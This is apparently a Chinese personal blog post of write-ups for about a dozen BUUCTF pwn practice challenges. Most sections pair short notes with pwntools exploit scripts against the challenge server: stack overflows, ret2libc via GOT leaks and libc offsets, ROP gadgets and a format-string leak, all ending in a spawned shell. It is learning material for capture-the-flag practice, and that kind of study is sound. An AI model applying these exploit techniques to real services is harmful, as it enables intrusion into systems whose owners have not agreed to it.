哈哈哈,我又来刷题了,看了下BUUCTF上面的pwn题还真多。。。
test_your_nc
ida查看,发现直接执行system,所以,直接交互就可以
//写下简单的脚本
from pwn import *
p = remote('node3.buuoj.cn',28213)
p.interactive()
rip
一道简单的栈溢出,但是远程有点问题?。。。所以,,,exp写的怪怪的。。。
没啥好说的
覆盖量为F+8=23
找system函数的时候,如果有参数的话,应该是去text段找,plt表里面的函数参数你懂的。。。还没传进来呢。。
由于远程有点问题,所以,emmm,一个可以得到flag 的方法是,先pop eip,然后再去执行system函数,,,不知道为什么这样好使。。正常来说,直接覆盖返回地址就好了,不要这样加一个pop eip
//exp:
from pwn import *
#context.log_level='debug'
p = remote('node3.buuoj.cn',27075)
sys_addr=0x0401186
retn_addr=0x0401185
#p.recvuntil("input")
payload='a'*23+p64(retn_addr)+p64(sys_addr)
p.sendline(payload)
p.interactive()
warmup_csaw_2016
哈哈哈,自己解出来题目的感觉真好。。。差点去看writeup了。。。懒。
一样一样啦,不过没有开启nx(注意,接下来会用到),nx是堆栈不可执行
因为没有开启nx,所以栈上的数据我们是可以用的
程序很简单,覆盖量是0x40+0x8=0x48
看一下text段,发现有system函数,而且,参数看着不错??emm我直接传入这个函数地址了,但是没有用,应该这个参数没有用。。。我记的有的可以?所以,那就自己传参数呗,,,
传入栈的地址是0x40
ok,可以写exp了
from pwn import *
p=remote('node3.buuoj.cn',28749)
binsh_addr=0x40
sys_addr=0x40060D
p.recvuntil(">")
payload='/bin/sh'
payload=payload.ljust(0x48,'a')
payload+=p64(sys_addr)
p.sendline(payload)
p.interactive()
pwn1_sctf_2016
早上起来做了一道,emmm,题目简单,只是服务器还是不会发信息,直接发过去就好
32位的程序
我们需要覆盖的量是0x3c,但是我们只能输入32(0x20)的数据
但是程序可以将I转换成三个符号的'you',所以,就可以够用了
0x3c/3=20,也就是20个‘I’,然后在覆盖ebp,四个a,再覆盖返回地址
所以就可以写exp了
from pwn import *
context.log_level='debug'
p=remote('node3.buuoj.cn',25555)
flag_addr=0x08048F0D
payload="I"*20+'aaaa'+p32(flag_addr)
#p.recvuntil("yourself:")
p.sendline(payload)
p.interactive()
ciscn_2019_n_1
64位的程序
很显然,我们只需要让v2等于11.825就可以
我们能控制的是v1,位置在rbp-30h
而v2的位置在rbp-4h
所以覆盖量为0x30-0x4=0x2c
有一个问题是,浮点数不能直接转换成字符串str(11.28125),需要找到11.28125在程序中的表示
这里也有一个在线工具:http://lostphp.com/hexconvert/
然后就直接把0x41348000再发过去就行了
exp如下:
from pwn import *
context.log_level='debug'
p=remote('node3.buuoj.cn',29320)
p.recvuntil('number')
payload='a'*0x2c+p64(0x41348000)
p.sendline(payload)
p.interactive()
[OGeek2019]babyrop
32位程序
因为strlen遇到‘\x00’就会停止,所以我们输入的字符串以‘\x00’开头的话,那么v1=0,strncmp比较的就相等,为0,跳过了验证
buf的地址在-2c,返回值v5在-25h,所以,两者相差
,我们只要覆盖7个地址,然后在最后一个覆盖很大,比如说‘\xff’
就可以
所以,我们还需要上一个函数的返回值很大
这里进行栈溢出,因为程序没有后门函数,所以需要泄漏函数地址,计算偏移
泄漏write地址
‘a’*0xe7+'aaaa'+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)偏移量 ebp 返回地址 write函数的返回地址 1表示输出 输出的内容 输出的长度
得到write函数地址:
write_addr=u32(p.recv(4))计算基地址:libcbase=write_addr-libc.symbols['write']
计算出system和binsh的偏移
libc文件也是可执行文件,可以在ida里面运行
计算出system和binsh的地址
system_addr=system_base+libcbase
binsh_addr=binsh_base+libcbase
因为刚刚write函数的返回地址是main函数,会在执行一次,第一次还是发‘\x00’和’\xff‘
第二次,就可以偏移+ebp+system+system返回地址+参数得到flag了
exp如下:
#coding=utf-8
from pwn import *
context.log_level='debug'
p=remote('node3.buuoj.cn',29248)
elf=ELF('./babyrop')
libc=ELF('./libc-2.23.so')
system_base=0x0003A940
binsh_base=0x015902b
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x08048825
payload1='\x00'+'\xff'*7
p.sendline(payload1)
p.recvuntil("Correct\n")
payload2='a'*0xe7+'bbbb'+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload2)
write_addr=u32(p.recv(4))
libcbase=write_addr-libc.symbols['write']
sys_addr=libcbase+system_base
binsh_addr=libcbase+binsh_base
p.sendline(payload1)
p.recvuntil("Correct\n")
payload2='a'*0xe7+'bbbb'+p32(sys_addr)+p32(0x0)+p32(binsh_addr)
p.sendline(payload2)
p.interactive()
ciscn_2019_c_1
64位程序
一开始看到表单,,,吓死,,,结果发现只有功能一能用,,,
这里,会对我们输入的字符串进行加密,但是我们程序会利用两次,一次泄漏一个函数地址,另一个getshell,所以两次异或数据变回原数据,所以其实不用管,,,
这里,我们需要覆盖的长度为0x50+0x8
接收到字符串,我们可以先打印出来看一下
所以我们可以接收直到@,,,
接下来,就可以得到puts的地址,然后计算出偏移,找到system和binsh的地址,第二次就可以得到flag
exp
# encoding=utf-8
from pwn import *
sh = remote('node3.buuoj.cn',27706)
elf = ELF('./ciscn_2019_c_1')
start = elf.sym['main']
rdi_addr = 0x0000000000400c83
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets_got = elf.got['gets']
sh.sendlineafter('choice!\n', '1')
payload1 = 'a' * 88 + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(start)
sh.sendline(payload1)
sh.recvuntil('@')
sh.recvline()
puts_leak = u64(sh.recvline()[:-1].ljust(8, '\0'))
log.success('puts==>'+hex(puts_leak))
libc = ELF('./libc/libc-2.27.so')
libc_base = puts_leak - libc.symbols['puts']
sys_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + 0x001b3e9a
sh.sendlineafter('choice!\n', '1')
payload2 = 'a' * 88 + p64(rdi_addr) + p64(bin_sh_addr) +p64(0x0400C1C)+ p64(sys_addr)
sh.sendline(payload2)
sh.interactive()
ciscn_2019_en_2
和ciscn_2019_c_1这道题本质是一样的,直接把端口改一下,flag就可以出来,,
get_started_3dsctf_2016
这道题,看着挺简单,,,稍后来写具体的writeup,
参考博客:
(1)https://www.cnblogs.com/bhxdn/p/12679290.html
(2)https://www.b1ndsec.cn/?p=371
有个地方不太懂得是,貌似都没又覆盖ebp?
静态链接,但是nx堆栈不可执行,但是静态链接里面有一个函数可以修改内存权限
学到的一个函数mprotect
函数原型:int mprotect(void * addr,size_t len,int prot);
addr 内存起始地址 ;
len 修改内存的长度
prot内存的权限
readelf -S get_started_3dsctf_2016 :可以查看各个段的基地址
【接下来,,,可能有很多不会,,就不放exp,主要是自己的一些学习心得】
[第五空间2019 决赛]PWN5
这道题和HITCON-Training lab7一模一样,,,只是unk_804C044地址不一样
https://blog.csdn.net/qq_43935969/article/details/105135361
emmm,还有就是buuoj没有发字符,,,不用recvuntil了,直接sendline就行
#coding=utf-8
from pwn import *
p=remote('node3.buuoj.cn',27453)
#p=process('./crack')
password_addr=0x0804C044
#p.recvuntil("name ?")
payload=p32(password_addr)+"#"+"%10$s"+"#"#'#'是必须的,可能需要停顿一下?可以用别的字符
p.sendline(payload)
p.recvuntil("#")
io=p.recvuntil("#")
password=u32(io[:4])
#p.recvuntil("password :")
p.sendline(str(password))
p.interactive()
root@kali:~/buuc还可以参考这篇:https://www.b1ndsec.cn/?p=368
它是字符串读入,直接把那个给改了
ciscn_2019_n_8
这道题,简单,不过自己十进制和十六进制有点混乱
只要将v[13]设置为17就行
这里17是十进制的
#coding=utf-8
from pwn import *
connect = 1#连接本地
fileName='ciscn_2019_n_8'#文件名
port='node3.buuoj.cn'#端口
ip=25793#IP地址
if connect:
p=remote(port,ip)
else :
p=process("./"+fileName+"")
p.recvuntil("?")
p.sendline('aaaa'*13+p32(0x11))
p.interactive() 【这篇博客有点长了,,,,前12道题,,,接下来重新开一篇新的】
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
